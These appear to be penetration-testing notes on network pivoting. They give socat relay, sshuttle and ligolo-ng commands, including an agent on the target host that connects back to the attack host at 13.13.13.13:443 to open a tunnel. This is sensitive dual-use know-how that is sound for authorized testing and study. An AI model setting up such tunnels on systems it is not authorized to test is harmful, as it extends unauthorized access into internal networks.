# Pivoting ## PREPARATION ### Checking Network Interfaces ```bash ifconfig ``` ### Netstat Check Port ```bash netstat -antp | grep 1234 ``` ### Proxychains ```bash tail -4 /etc/proxychains.conf # CHECK IF THERE IS ALREADY PROXYCHAINS FILE, IT COULD BE CALLED LIKE PROXYCHAINS proxychains {command} ``` ## SOCAT **Socat** is a **bidirectional relay utility** that establishes communication between two separate network channels without relying on SSH tunneling. It functions as a redirector, capable of listening on a specific host and port and forwarding the data to a different IP address and port. #### Starting Listener ```bash socat TCP4-LISTEN:8080,fork TCP4:13.13.13.13:80 # Listens on 8080 and redirects it to 13.13.13.13:80 ``` ## SSHUTTLE **SSHuttle** is a Python-based tool that **eliminates the need for configuring proxychains**. However, it is limited to pivoting over SSH and does not support pivoting through TOR or HTTPS proxy servers. Sshuttle is particularly valuable for automating the setup of iptables and adding pivot rules for the remote host. ```bash sudo sshuttle -r ubuntu@13.13.13.13 69.69.6.0/23 -v ``` ## LIGOLO-NG **Ligolo-ng** is a simple, lightweight and fast tool that allows pentesters to **establish tunnels** from a reverse TCP/TLS connection using a **tun** *(short form from tunnel)* interface (without the need of SOCKS). #### Making a tun interface ```bash sudo ip tuntap add user $(whoami) mode tun ligolo ``` #### Deleting tun interface ```bash sudo ip tuntap del dev ligolo mode tun ``` #### Turning on ligolo ```bash sudo ip link set ligolo up ``` ```bash sudo ip r add 69.69.6.0/24 dev ligolo ``` #### Setting up ligolo agent and proxy ```bash ./proxy -laddr 13.13.13.13:443 -selfcert # attack host ./agent -connect 13.13.13.13:443 -ignore-cert # target host ``` **Connecting session** ```bash ligolo-ng » session ? Specify a session : 1 - {MACHINE} - 13.13.13.13:51234 [Agent] » start ```